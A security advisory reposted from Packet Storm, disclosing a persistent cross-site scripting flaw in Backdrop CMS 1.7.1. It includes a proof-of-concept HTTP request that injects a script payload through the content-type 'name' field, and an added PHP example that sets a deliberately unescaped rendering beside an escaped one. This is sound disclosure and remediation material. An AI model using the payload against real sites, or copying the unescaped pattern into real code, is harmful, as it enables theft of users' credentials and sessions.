Backdrop CMS 1.7.1 Cross Site Scripting

Date: 23 Aug 2017
Reported by: Manuel Garcia Cardenas
Type: packetstorm
Source: packetstormsecurity.com

Backdrop CMS 1.7.1 Persistent Cross-Site Scripting vulnerability discovered by Manuel Garcia Cardenas allows execution of arbitrary HTML/script code

=============================================  
MGC ALERT 2017-005  
- Original release date: July 11, 2017  
- Last revised: August 18, 2017  
- Discovered by: Manuel Garcia Cardenas  
- Severity: 4,8/10 (CVSS Base Score)  
=============================================  
  
I. VULNERABILITY  
-------------------------  
Backdrop CMS <= 1.7.1 - Persistent Cross-Site Scripting  
  
II. BACKGROUND  
-------------------------  
Backdrop CMS is a simple, lightweight, and easy to use Content Management  
System used to build attractive, professional websites.  
  
III. DESCRIPTION  
-------------------------  
A Persistent XSS vulnerability has been detected in Backdrop CMS that  
allows arbitrary HTML/script code to be executed in the context of the  
victim user's browser.  
  
IV. PROOF OF CONCEPT  
-------------------------  
Go to: Structure -> Content types -> Add content type  
  
And post:  
  
POST /backdrop/admin/structure/types/add HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 605  
Referer: http://127.0.0.1/backdrop/admin/structure/types/add  
Cookie: Backdrop.tableDrag.showWeight=0;  
PHPSESSID=libl3ge64tv5vajangccjhifu2; phpwcmsBELang=en;  
phpwcmsBEItemsPerPage=50; _ctr=MTI3XzBfMF8xLlpa;  
nv4_cltz=120.60.120%257C%252F%257C;  
nv4_cltn=RXVyb3BlL0Ftc3RlcmRhbS43MjAwLjE%3D;  
nv4c_x4OOk_ctr=MTI3XzBfMF8xLlpa; nv4c_x4OOk_cltz=120.60.120%257C%252F%257C;  
gnew_date_format=D%2C+M+jS+Y%2C+g%3Ai+a; gnew_date_offset=0;  
gnew_language=english; gnew_template=clean;  
SESSaca5a63f4c2fc739381fab7741d68783=X4OPoKhvYQz8Q8QwCrVpgq3JuG4fQ84n1XpQQH0SCjo  
Connection: close  
Upgrade-Insecure-Requests: 1  
  
name=test%22%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&type=test_script_alert&description=&title_label=Demo&help=&status_default=1&sticky_enabled=1&promote_enabled=1&path_pattern=%5Bnode%3Acontent-type%5D%2F%5Bnode%3Atitle%5D&revision_enabled=1&node_submitted=1&node_user_picture=1&comment_default=2&comment_per_page=50&comment_mode=1&comment_user_picture=1&comment_form_location=1&comment_preview=1&additional_settings__active_tab=&form_build_id=form-biLaugWmv7Z4fGmSK73PYxQZo7hgIwxL2gRwijtrBFA&form_token=j4801oRGZnTQshQQdJ1IKF7-doK6IhB51F1d4nIPwY4&form_id=node_type_form&op=Save+and+add+fields  
  
The "name" parameter is not sanitized. Later, if you go to the content  
type created and click "Manage Displays":  
  
GET /backdrop/admin/structure/types/manage/test-script-alert/display HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
  
The XSS is executed; in the response you can see:  
  
Manage display</a></li></ul></div></div></td> </tr><tr class="header  
even"><td>Customized for test"><script>alert(/XSS/)</script></td><td  
class="priority-low"></td><td></td> </tr>  
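Added example (not Backdrop's own code): a standalone PHP reconstruction of the unescaped "Customized for" table cell shown above, beside its escaped form. The function names are hypothetical and the input is the URL-decoded `name` value from the POST body.

```php
<?php
declare(strict_types=1);

// Vulnerable pattern (hypothetical reconstruction of the advisory's
// behaviour): the content type name is concatenated straight into the
// HTML table cell, so a name containing markup reaches the browser as markup.
function render_customized_cell_vulnerable(string $name): string
{
    return '<td>Customized for ' . $name . '</td>';
}

// Hardened form: escape the name for an HTML text context before output.
// In Backdrop the framework helper for this is check_plain(); the plain-PHP
// equivalent used here is htmlspecialchars() with quotes escaped and UTF-8.
function render_customized_cell_safe(string $name): string
{
    $escaped = htmlspecialchars($name, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<td>Customized for ' . $escaped . '</td>';
}

// Regression check a reviewer can run against rendered output: does the
// untrusted value still appear as a raw <script> tag?
function contains_raw_script(string $html): bool
{
    return stripos($html, '<script') !== false;
}

// Constructed input: the decoded "name" from the advisory's POST request.
$name = 'test"><script>alert(/XSS/)</script>';

$vulnerable = render_customized_cell_vulnerable($name);
$safe       = render_customized_cell_safe($name);

echo "vulnerable: {$vulnerable}", PHP_EOL;
echo "safe:       {$safe}", PHP_EOL;

// The vulnerable rendering keeps the tag; the escaped rendering does not.
assert(contains_raw_script($vulnerable) === true);
assert(contains_raw_script($safe) === false);
echo 'escaping check passed', PHP_EOL;
```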
  
V. BUSINESS IMPACT  
-------------------------  
An attacker can execute arbitrary HTML or script code in a targeted user's  
browser; this can be leveraged to steal sensitive information such as user  
credentials, personal data, etc.  
  
VI. SYSTEMS AFFECTED  
-------------------------  
Backdrop CMS <= 1.7.1  
  
VII. SOLUTION  
-------------------------  
Install the latest release:  
https://github.com/backdrop/backdrop/releases/tag/1.7.2  
  
VIII. REFERENCES  
-------------------------  
https://backdropcms.org/security/backdrop-sa-core-2017-009  
  
IX. CREDITS  
-------------------------  
This vulnerability has been discovered and reported  
by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).  
  
X. REVISION HISTORY  
-------------------------  
July 11, 2017 1: Initial release  
August 18, 2017 2: Last revision  
  
XI. DISCLOSURE TIMELINE  
-------------------------  
July 11, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas  
July 11, 2017 2: Send to vendor  
August 17, 2017 3: Vendor fix in version 1.7.2  
August 18, 2017 4: Sent to lists  
  
XII. LEGAL NOTICES  
-------------------------  
The information contained within this advisory is supplied "as-is" with no  
warranties or guarantees of fitness of use or otherwise.  
  
XIII. ABOUT  
-------------------------  
Manuel Garcia Cardenas  
Pentester  
